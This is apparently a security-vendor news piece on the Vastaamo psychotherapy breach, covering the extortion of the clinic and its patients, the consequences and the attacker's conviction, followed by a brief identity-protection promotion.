The subject of this outrage focused on the cybercriminals behind an attack on Finnish psychotherapy practice Vastaamo. Because it was a psychotherapy practice, the records contained extremely sensitive and confidential information about some of the most vulnerable people.

Sadly, the attacker did not stop at extorting the clinic but also sent extortion messages to the patients, asking them to pay around $240 to prevent their data from being published online. And that was a first, as far as we know—not just demanding a ransom from the breached organization, but also from all those that were unlucky enough to have their data on record there.

The attacker demanded a €400,000 ($425,000) ransom from the company. When it refused to pay, he emailed thousands of patients asking for €200 and threatening to publish their therapy notes and personal details on the dark web if they didn’t pay. He ended up publishing it anyway.

As a result of this cyberattack and the extortion attempts:

*   Vastaamo’s board fired the CEO because they held him responsible for knowing about the breaches and of the shortcomings in the psychotherapy provider’s data security systems.
*   Vastaamo’s owner, who bought the practice a few months after the second breach but was not informed about it, began legal proceedings related to its purchase.
*   Vastaamo had to shut its doors because it could not meet its financial obligations.
*   The Finnish government contemplated expanding the options for individuals to change their social security number in certain circumstances, such as the aftermath of a hacking incident.
*   At least one suicide has been linked to the case.

Now the attacker has been convicted. 26-year-old Julius Kivimäki has been sentenced to six years and three months in prison. Kivimäki, known online as Zeekill, was one of the leading members of several groups of teenage cybercriminals which caused chaos between 2009-2015. One of those groups was the infamous Lizard Squad.

At the age of 17, Kivimäki was convicted of more than 50,000 computer hacks and sentenced to a two-year prison sentence, which was suspended because he was 15 and 16 when he carried out the crimes in 2012 and 2013.

Despite the conviction, the Vastaamo case is not over as civil court cases are now likely to begin to seek compensation for the victims of the hack.

**We don’t just report on threats – we help safeguard your entire digital identit**y

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection

Tag

#web